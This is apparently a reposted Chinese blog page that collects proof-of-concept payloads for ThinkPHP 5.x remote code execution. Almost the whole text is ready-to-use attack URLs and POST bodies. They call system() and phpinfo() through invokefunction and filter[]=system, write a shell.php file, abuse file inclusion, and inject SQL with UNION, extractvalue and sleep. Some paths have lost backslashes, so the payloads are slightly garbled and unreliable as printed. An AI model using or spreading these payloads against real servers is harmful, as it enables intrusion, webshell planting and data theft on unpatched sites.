Thinkphp V5.X 远程代码执行漏洞 - POC(搬运)

Posted Cxlover的博客哦

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Thinkphp V5.X 远程代码执行漏洞 - POC(搬运)相关的知识,希望对你有一定的参考价值。

文章来源:lsh4ck‘s Blog

 

原文链接:

https://www.77169.com/html/237165.html

 

Thinkphp 5.0.22

 

  1. http://192.168.1.1/thinkphp/public/?s=.|thinkconfig/get&name=database.username

  2. http://192.168.1.1/thinkphp/public/?s=.|thinkconfig/get&name=database.password

  3. http://url/to/thinkphp_5.0.22/?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

  4. http://url/to/thinkphp_5.0.22/?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

 

Thinkphp 5

 

  1. http://127.0.0.1/tp5/public/?s=index/ hinkView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

 

Thinkphp 5.0.21

 

  1. http://localhost/thinkphp_5.0.21/?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

  2. http://localhost/thinkphp_5.0.21/?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

 

Thinkphp 5.1.*

 

  1. http://url/to/thinkphp5.1.29/?s=index/ hinkRequest/input&filter=phpinfo&data=1

  2. http://url/to/thinkphp5.1.29/?s=index/ hinkRequest/input&filter=system&data=cmd

  3. http://url/to/thinkphp5.1.29/?s=index/ hink emplatedriverfile/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

  4. http://url/to/thinkphp5.1.29/?s=index/ hinkviewdriverPhp/display&content=%3C?php%20phpinfo();?%3E

  5. http://url/to/thinkphp5.1.29/?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

  6. http://url/to/thinkphp5.1.29/?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

  7. http://url/to/thinkphp5.1.29/?s=index/ hinkContainer/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

  8. http://url/to/thinkphp5.1.29/?s=index/ hinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

 

未知版本

 

  1. ?s=index/ hinkmodule/action/param1/${@phpinfo()}

  2. ?s=index/ hinkModule/Action/Param/${@phpinfo()}

  3. ?s=index/ hink/module/aciton/param1/${@print(THINK_VERSION)}

  4. index.php?s=/home/article/view_recent/name/1‘

  5. header = "X-Forwarded-For:1‘) and extractvalue(1, concat(0x5c,(select md5(233))))#"

  6. index.php?s=/home/shopcart/getPricetotal/tag/1%27

  7. index.php?s=/home/shopcart/getpriceNum/id/1%27

  8. index.php?s=/home/user/cut/id/1%27

  9. index.php?s=/home/service/index/id/1%27

  10. index.php?s=/home/pay/chongzhi/orderid/1%27

  11. index.php?s=/home/pay/index/orderid/1%27

  12. index.php?s=/home/order/complete/id/1%27

  13. index.php?s=/home/order/complete/id/1%27

  14. index.php?s=/home/order/detail/id/1%27

  15. index.php?s=/home/order/cancel/id/1%27

  16. index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+

  17. POST /index.php?s=/home/user/checkcode/ HTTP/1.1
    Content-Disposition: form-data; name="couponid"1‘) union select sleep(‘‘‘+str(sleep_time)+‘‘‘)#

 

Thinkphp 5.0.23(完整版)Debug 模式

 (post)public/index.php

(data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx

 

Thinkphp 5.0.23(完整版)

 (post)public/index.php?s=captcha

(data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

 

Thinkphp 5.0.10(完整版)

 (post url)public/index.php?s=index/index/index

(data)s=whoami&_method=__construct&method&filter[]=system

 

Thinkphp 5.1.* 和 5.2.* 和 5.0.*

 (post url)public/index.php

(data)c=exec&f=calc.exe&_method=filter

 

当 Php7 以上无法使用 Assert 的时候用

_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=包含&x=phpinfo();

有上传图片或者日志用这个包含就可以

以上是关于Thinkphp V5.X 远程代码执行漏洞 - POC(搬运)的主要内容,如果未能解决你的问题,请参考以下文章

Vulnhub-ThinkPHP5 任意代码执行漏洞

ThinkPHP 5.0.23 远程代码执行漏洞(CVE-2018-20062)漏洞复现

ThinkPHP5 远程代码执行

漏洞预警 | ThinkPHP 5.x远程命令执行漏洞

ThinkPHP 5.x远程命令执行漏洞

ThinkPHP5.0.x 远程代码执行